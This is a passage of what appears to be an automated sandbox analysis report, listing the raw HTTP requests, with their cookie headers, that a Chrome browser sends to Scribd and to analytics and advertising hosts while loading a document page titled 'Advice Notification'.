osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; _fs_sample_user=false; _dd_s=rum=0&expire=1733523263684; __CJ_nwt=%7B%22nw2868%22%3A7327%7D
    Source: global trafficHTTP traffic detected: GET /images/scribd_logo_horiz_small_slate.svg HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /workspaces/7de87bc73aff1974945059e230fb953d/web_surveys.js HTTP/1.1Host: survey.survicate.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wi/config/10143699.json HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /csrf_token HTTP/1.1Host: www.scribd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; _fs_sample_user=false; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f91-47ab-8dba-9f2882b68d4f%22%2C%22cookies_enabled%22%3Atrue%2C%22hardware_concurrency%22%3A4%2C%22height%22%3A1024%2C%22java_enabled%22%3Afalse%2C%22left%22%3A0%2C%22max_touch_points%22%3A0%2C%22orientation%22%3A%22landscape-primary%22%2C%22pixel_depth%22%3A24%2C%22platform%22%3A%22Win32%22%2C%22referrer%22%3A%22%22%2C%22time_zone%22%3A%22America%2FNew_York%22%2C%22top%22%3A0%2C%22width%22%3A1280%7D; _dd_s=rum=0&expire=1733523263684; _li_dcdm_c=.scribd.com; _scribd_session=UlVnZzY0RlR0NVF3UmNaZmRmN3ZFUENkeTRERFQ2UzlnOFB4NmxkZFo4RDMzMVdrWjdJWlZZdHhkNVZEbGx0ZG5xRFBWSnpJOGxIYkgwcjl3SHlSZG5SKzhmRG03M2MzUUFBdEVNZ3RNbkpkcGdRMFgzSHQzcU1RUGtQZldweUtZOEt5OW1OWS9TNnlFSlliWkdBUWF4V1dVUytsWFdSaHdjSURhaEQ0d3NVL3RTTUNyK0JhZU1ZSE40R2xQa0h2cUxwaExacDd1eWovR09ZV2dsd3kwZEtzWmFld1Q4eW9qc0tSM3pWNmxHdzk5ZHRWZFVqdGloZEdDRjIxVGx2TXpHU25PbGhKRURKUDg4ank2ckxiT3BDTUdIM0U1MHFwOUV4UHJSSkVzbFdQdStyMGgxQzQyTXpkUU9QSWhrcFQtLVVvYklTUjZmYWJqSThGbzdVUlRTN2c9PQ%3D%3D--a57245b927d8f6e851d3853f71018b5eeaa4013c
    Source: global trafficHTTP traffic detected: GET /wi/ytc.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/scribd_logo_horiz_small_slate.svg HTTP/1.1Host: s-f.scribdassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /a-05td.min.js HTTP/1.1Host: b-code.liadm.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /log/dd HTTP/1.1Host: wa.scribd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f91-47ab-8dba-9f2882b68d4f%22%2C%22cookies_enabled%22%3Atrue%2C%22hardware_concurrency%22%3A4%2C%22height%22%3A1024%2C%22java_enabled%22%3Afalse%2C%22left%22%3A0%2C%22max_touch_points%22%3A0%2C%22orientation%22%3A%22landscape-primary%22%2C%22pixel_depth%22%3A24%2C%22platform%22%3A%22Win32%22%2C%22referrer%22%3A%22%22%2C%22time_zone%22%3A%22America%2FNew_York%22%2C%22top%22%3A0%2C%22width%22%3A1280%7D; _li_dcdm_c=.scribd.com; _scribd_session=UlVnZzY0RlR0NVF3UmNaZmRmN3ZFUENkeTRERFQ2UzlnOFB4NmxkZFo4RDMzMVdrWjdJWlZZdHhkNVZEbGx0ZG5xRFBWSnpJOGxIYkgwcjl3SHlSZG5SKzhmRG03M2MzUUFBdEVNZ3RNbkpkcGdRMFgzSHQzcU1RUGtQZldweUtZOEt5OW1OWS9TNnlFSlliWkdBUWF4V1dVUytsWFdSaHdjSURhaEQ0d3NVL3RTTUNyK0JhZU1ZSE40R2xQa0h2cUxwaExacDd1eWovR09ZV2dsd3kwZEtzWmFld1Q4eW9qc0tSM3pWNmxHdzk5ZHRWZFVqdGloZEdDRjIxVGx2TXpHU25PbGhKRURKUDg4ank2ckxiT3BDTUdIM0U1MHFwOUV4UHJSSkVzbFdQdStyMGgxQzQyTXpkUU9QSWhrcFQtLVVvYklTUjZmYWJqSThGbzdVUlRTN2c9PQ%3D%3D--a57245b927d8f6e851d3853f71018b5eeaa4013c; _lc2_fpi=4b59e25de34b--01jeezr76nste791ys80m8qnan
    Source: global trafficHTTP traffic detected: GET /doc-page/recommenders/801519291?recs_veils_of_discoverability=undefined&recs_embedding_reranking_docpage=undefined&recs_explore_rerank_scribd=undefined&doc_page_pmp_boosting=control HTTP/1.1Host: www.scribd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; _fs_sample_user=false; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f91-47ab-8dba-9f2882b68d4f%22%2C%22cookies_enabled%22%3Atrue%2C%22hardware_concurrency%22%3A4%2C%22height%22%3A1024%2C%22java_enabled%22%3Afalse%2C%22left%22%3A0%2C%22max_touch_points%22%3A0%2C%22orientation%22%3A%22landscape-primary%22%2C%22pixel_depth%22%3A24%2C%22platform%22%3A%22Win32%22%2C%22referrer%22%3A%22%22%2C%22time_zone%22%3A%22America%2FNew_York%22%2C%22top%22%3A0%2C%22width%22%3A1280%7D; _li_dcdm_c=.scribd.com; _scribd_session=UlVnZzY0RlR0NVF3UmNaZmRmN3ZFUENkeTRERFQ2UzlnOFB4NmxkZFo4RDMzMVdrWjdJWlZZdHhkNVZEbGx0ZG5xRFBWSnpJOGxIYkgwcjl3SHlSZG5SKzhmRG03M2MzUUFBdEVNZ3RNbkpkcGdRMFgzSHQzcU1RUGtQZldweUtZOEt5OW1OWS9TNnlFSlliWkdBUWF4V1dVUytsWFdSaHdjSURhaEQ0d3NVL3RTTUNyK0JhZU1ZSE40R2xQa0h2cUxwaExacDd1eWovR09ZV2dsd3kwZEtzWmFld1Q4eW9qc0tSM3pWNmxHdzk5ZHRWZFVqdGloZEdDRjIxVGx2TXpHU25PbGhKRURKUDg4ank2ckxiT3BDTUdIM0U1MHFwOUV4UHJSSkVzbFdQdStyMGgxQzQyTXpkUU9QSWhrcFQtLVVvYklTUjZmYWJqSThGbzdVUlRTN2c9PQ%3D%3D--a57245b927d8f6e851d3853f71018b5eeaa4013c; _lc2_fpi=4b59e25de34b--01jeezr76nste791ys80m8qnan; _dd_s=rum=0&expire=1733523263684
    Source: global trafficHTTP traffic detected: GET /s/c/a-05td?duid=4b59e25de34b--01jeezr76nste791ys80m8qnan&euns=0&pt=500&s=&us_privacy=1-N-&version=v3.5.0&cd=.scribd.com&pv=fcc8441e-bec8-423c-9a94-14aa0e5d1ab4 HTTP/1.1Host: i.liadm.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /j?dtstmp=1733522365790&aid=a-05td&se=e30&duid=4b59e25de34b--01jeezr76nste791ys80m8qnan&tv=v3.5.0&pu=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&us_privacy=1-N-&wpn=lc-bundle&wpv=v3.5.0&cd=.scribd.com&c=PHRpdGxlPkFkdmljZSBOb3RpZmljYXRpb24gfCBQREY8L3RpdGxlPjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJBZHZpY2UgTm90aWZpY2F0aW9uIC0gRnJlZSBkb3dubG9hZCBhcyBQREYgRmlsZSAoLnBkZiksIFRleHQgRmlsZSAoLnR4dCkgb3IgdmlldyBwcmVzZW50YXRpb24gc2xpZGVzIG9ubGluZS4gQWR2aWNlIE5vdGlmaWNhdGlvbiI-PGxpbmsgcmVsPSJjYW5vbmljYWwiIGhyZWY9Imh0dHBzOi8vd3d3LnNjcmliZC5jb20vZG9jdW1lbnQvODAxNTE5MjkxL0FkdmljZS1Ob3RpZmljYXRpb24iPjx0aXRsZSBpZD0iNmEzMGQ0MDktNGUyNi00ODQyLWFkNzEtYjFhZDA4ZDE5MzczIj48IS0tLS0-Q2xvc2UgdGhpcyBkaWFsb2c8IS0tLS0-PC90aXRsZT48dGl0bGUgaWQ9ImNkMjJlYmIwLTc2ZTctNDkxOS04OGUzLTViMmE2MWM1MDM4OCI-PCEtLS0tPkNsb3NlIENvb2tpZSBQcmVmZXJlbmNlczwhLS0tLT48L3RpdGxlPg&pv=fcc8441e-bec8-423c-9a94-14aa0e5d1ab4 HTTP/1.1Host: rp.liadm.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /workspaces/7de87bc73aff1974945059e230fb953d/web_surveys.js HTTP/1.1Host: survey.survicate.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /documents/801519291/pingback HTTP/1.1Host: www.scribd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; _fs_sample_user=false; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f91-47ab-8dba-9f2882b68d4f%22%2C%22cookies_enabled%22%3Atrue%2C%22hardware_concurrency%22%3A4%2C%22height%22%3A1024%2C%22java_enabled%22%3Afalse%2C%22left%22%3A0%2C%22max_touch_points%22%3A0%2C%22orientation%22%3A%22landscape-primary%22%2C%22pixel_depth%22%3A24%2C%22platform%22%3A%22Win32%22%2C%22referrer%22%3A%22%22%2C%22time_zone%22%3A%22America%2FNew_York%22%2C%22top%22%3A0%2C%22width%22%3A1280%7D; _li_dcdm_c=.scribd.com; _lc2_fpi=4b59e25de34b--01jeezr76nste791ys80m8qnan; _dd_s=rum=0&expire=1733523266372; _scribd_session=ejNIM0NJQ1NlNjEzQkhJSEs2Y3JZNmpkVVVjUFZyLytkTlptaW11eFAyWGVVcUZ5ZDUyWmc1aGZLVHh4SmdadDN2WWgvNklJWU9JSEVrRmxDekplVjRVRGllaGNpWUIwMDdTczhXZnJGL1RFZVpJZkZUUGpFTC9MNWQ1V3Voa2xFRkdFbi9rWWkwNkhCM2c0bm1XaUNYNGVNUFQ2WU5UNUdvOUMzRkdVQm9SdDNTWVNqS0k2SFQ3eFZXQzZ0MEt3cG5wbVpCZG1Iek1uNERObHJqTU5YUjFhZy9RWlFSRk5USWROUzlJbjhqMjlpaldHUU1ScDhrY0NzVlA5aVVoa0hwR0EwOUVBTFU2TVBSVmpZelhJYXlsT3JRSnluZTZYc2lORTNNTDI1YTNsa3VXUER4UnRoNExYdDN2dFlRK0UtLUYwNmNoVkFjRWcwTDFtZ1hXMlJOQVE9PQ%3D%3D--51e6b57ecb0d9d7b40f08082086bfce630df5211
    Source: global trafficHTTP traffic detected: GET /doc-page/personalization HTTP/1.1Host: www.scribd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; _fs_sample_user=false; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f91-47ab-8dba-9f2882b68d4f%22%2C%22cookies_enabled%22%3Atrue%2C%22hardware_concurrency%22%3A4%2C%22height%22%3A1024%2C%22java_enabled%22%3Afalse%2C%22left%22%3A0%2C%22max_touch_points%22%3A0%2C%22orientation%22%3A%22landscape-primary%22%2C%22pixel_depth%22%3A24%2C%22platform%22%3A%22Win32%22%2C%22referrer%22%3A%22%22%2C%22time_zone%22%3A%22America%2FNew_York%22%2C%22top%22%3A0%2C%22width%22%3A1280%7D; _li_dcdm_c=.scribd.com; _lc2_fpi=4b59e25de34b--01jeezr76nste791ys80m8qnan; _dd_s=rum=0&expire=1733523266372; _scribd_session=UjRyUkx6ajhieWxSN3VsTXVraHhmRmZzNWNNNFd6RlFGSmFxUGFuY0djMDQ0c25mNFEyRERLQVh1ZFBBem5sUEJySlNUOHFiUlFVYjB5WGx4elZmWGNBcVdNcHBSVFh2dG81UXY5dGxNNTlpQmV6WVV1MGw0WE14aVR5ZENUK0xCMThYME5DZExaZFRlT0NUYlVVSzdhd2lzZm1RWmJML0psd2h6SEE4OFVQaEFJTGJXVkNwZ3BXNEd5cW9aTkFaOFB6L044RlJvQ0pZbnhkZnc1dElVKzJMbFZteEVVWlVPb1ZUTDJDRmlTSUlTZzU1SUNxeUhUM0Vya3o5T3RKcTd4MGhvRTJVRXZlaUJIYnFoL0tHMG5oRGNSaHBmdkYrNlhCd0JjazAwaVJpeUV1K2d5MEJBeWx0SW9ybDl2TmUtLVYzTnBsREljTzJucWNEaTA5OEtMMHc9PQ%3D%3D--6834cd9348dca4f7c7b47f4bef7032dd8ac620ae
    Source: global trafficHTTP traffic detected: GET /uwt.js HTTP/1.1Host: static.ads-twitter.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /log/dd HTTP/1.1Host: wa.scribd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; 